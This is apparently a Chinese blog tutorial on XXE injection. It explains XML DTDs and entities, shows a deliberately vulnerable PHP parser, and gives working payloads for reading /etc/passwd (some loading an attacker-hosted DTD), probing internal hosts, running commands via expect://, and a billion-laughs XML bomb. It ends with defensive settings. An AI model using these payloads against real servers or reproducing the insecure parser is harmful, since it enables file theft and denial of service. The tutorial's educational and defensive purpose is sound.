XXE（XML外部实体注入）漏洞

最新推荐文章于 2024-06-29 14:13:16 发布

弥补之途

最新推荐文章于 2024-06-29 14:13:16 发布

阅读量2k

点赞数 2

文章标签： xml 安全 web安全服务器

本文链接：https://blog.csdn.net/F2444790591/article/details/125706940

版权

一、XML介绍

定义

XML全称：可扩展标记语言（Extensible Markup Language）。

XML是独立于软件和硬件的信息传输工具，它把数据从HTML中分离。 XML语言没有预定义的标签，需要作者定义自己的标签和自己的文档结构。

XML 被设计用来传输和存储数据，HTML 被设计用来显示数据。

在这里插入图片描述

        DTD ：文档类型定义 部分定义了XML文档的标签以及元素属性。上图DTD 就定义了XML的根元素为 note，然后根元素下面有一些子元素 (to,from,heading,body)，那么下面的文档元素就可以使用这些元素。

        PCDATA：可被解析的字符数据。PCDATA 数据类型是会被解析器解析的文本。这些文本将被解析器检查实体以及标记。文本中的标签会被当作标记来处理，而实体会被展开。与之对应的是CDATA。

        CDATA：不被解析的字符数据，CDATA 数据类型是不会被解析器解析的文本，在这些文本中的标签不会被当作标记来对待，其中的实体也不会被展开。

DTD

内部DTD声明

声明格式： <!DOCTYPE 根元素 [元素声明]>

如上例使用就是内部 DTD声明。

外部DTD声明

声明格式： <!DOCTYPE 根元素 SYSTEM "文件名">

通过引入 DTD文件的方式进行声明（这一点和 css，javascript 很像）。
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "test.dtd">
<note>
<to>H</to>
<from>E</from>
<head>L</head>
<body>LO</body>
</note>
test.dtd
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT head (#PCDATA)> 
<!ELEMENT body (#PCDATA)>

实体

按实体值所在位置分类（实体定义在 DTD声明中）

内部实体：就是把实体值定义在内部声明中。
<?xml version="1.0"?>
<!DOCTYPE sss [
<!ELEMENT sss ANY >
<!ENTITY xxe "hello" >
]>

<sss>
<user>&xxe;</user>
<pass>pass</pass>
</sss>
这里定义元素为 ANY 表示可以接受任何元素作为标签，这里的 "xxe" 就是我们所说的实体了（相当于一个变量），可以在XML文档元素中使用 & 符号对实体进行引用。到时候输出的时候 &xxe; 就会被 hello 替换。

外部实体：把实体定义在外部文件中。
<?xml version="1.0"?>
<!DOCTYPE sss [
<!ELEMENT sss ANY >
<!ENTITY xxe SYSTEM "file:///D:/test.dtd" > //引入外部dtd文件
]>
<sss>
    <user>&xxe;</user>
    <pass>pass</pass>
</sss>
        这样当需要更改实体的值时，只需要更改外部的 dtd 文件就行，不需要打开源码更改了（降低了耦合性），但也带来了安全漏洞。

        不同程序支持的协议不同：

按实体类型分类

通用实体

        用 &实体名;引用，在DTD 中定义（内外DTD都行），在 XML文档元素中引用。上面的例子都是通用实体。

        参数实体

        使用 % 实体名(中间有空格) 在DTD中定义（内外DTD都行），并且只能在DTD中使用 %实体名; 引用。在 DTD 文件中，参数实体的声明可以引用这两种实体。
<?xml version="1.0" encoding="utf-8">
<!DOCTYPE Author [
<!ENTITY % first "Hello">
<!ENTITY % second "%first;_World">
%second;]>
%second; 会解析为：Hello_World

二、漏洞原理

XML外部实体注入（XML Extenrnal Entity Injection），简称XXE漏洞。XML解析依赖库libxml默认开启了对外部实体的引用（libxml<2.9 默认开启），导致服务端在解析用户提交的XML信息时未作处理直接进行解析，导致加载恶意的外部文件和代码，造成任意文件读取，命令执行、内网扫描等危害。

解析XML的php文件: test.php

<?php
    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    $creds = simplexml_import_dom($dom);
    echo $creds;
?>

正常的XML文件
<?xml version="1.0"?>
<!DOCTYPE s [
<!ELEMENT s ANY >
<!ENTITY xxe SYSTEM "file:///D:/test.dtd" > 
]>
<s>
    <user>&xxe;</user>
    <pass>pass</pass>
</s>
将正常的外部文件路径换成敏感文件的路径，即可读出敏感文件内容。

三、漏洞利用

任意文件读取

方式一：直接通过外部实体声明：
<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE a [  
<!ENTITY b SYSTEM "file:///etc/passwd"> ]> 
<a>&b;</a>
方式二：外部实体声明（通用实体）+ 外部 DTD文件：
<?xml version="1.0"?>
<!DOCTYPE a SYSTEM "http://XXX/test.dtd">
<c>&b;</c>


这里的 http://XXX/test.dtd 是攻击者自己服务器上的文件。
<!ENTITY b SYSTEM "file:///etc/passwd">
方式三：外部实体声明（参数实体） + 引入外部实体声明：
<?xml version="1.0"?>
<!DOCTYPE a[
	<!ENTITY % d SYSTEM "http://XXX/test.dtd">
	%d;
]>
<c>&b;</c>

test.dtd内容：
<!ENTITY b SYSTEM "file:///etc/passwd">
注意这种方式必须要先引用参数实体，才能引用通用实体，且缺一不可。

内网探测

XML 外部实体中是可以使用http://协议，可以利用该请求去探查内网。
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80" >]>
<root>
<name>&xxe;</name>
</root>

攻击内网网站

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "http://127.0.0.1:80/payload" >]>
<root>
<name>&xxe;</name>
</root>

命令执行

在安装 expect扩展的PHP环境里执行系统命令，其他协议也有可能可以执行系统命令。
因为PHP的 expect 并不是默认安装扩展，所以命令执行比较难利用。
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "expect://cat /" >]>
<root>
<name>&xxe;</name>
</root>

发起Dos攻击

几乎所有可以控制服务器资源利用的东西，都可用于制造DOS攻击。通过XML外部实体注入，攻击者可以发送任意的HTTP请求，因为解析器会解析文档中的所有实体，所以如果实体声明层层嵌套的话，在一定数量上可以对服务器器造成DoS。

常见的XML炸弹：
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
攻击原理：XML解析器尝试解析该文件时，DTD中的实体会以指数级的数量级展开，lol 实体为 “lol” 字符串，然后一个 lol2 实体引用了 10 次 lol 实体，一个 lol3 实体引用了 10 次 lol2 实体，此时一个 lol3 实体就含有 10^2 个 “lol” 了，以此类推，lol9 实体含有 10^8 个 “lol” 字符串，所以这个1K不到的文件经过解析后会占用到3G的内存,可见有多恐怖，不过现代的服务器软硬件大多已经抵御了此类攻击。

防御XML炸弹的方法也很简单禁止DTD或者是限制每个实体的最大长度。

防御方法

方法一：使用开发语言提供的禁用外部实体的方法

PHP：

        libxml_disable_entity_loader(true);

JAVA：

        DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();         dbf.setExpandEntityReferences(false);

Python:

        from lxml import etree

        xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

方法二：过滤用户输入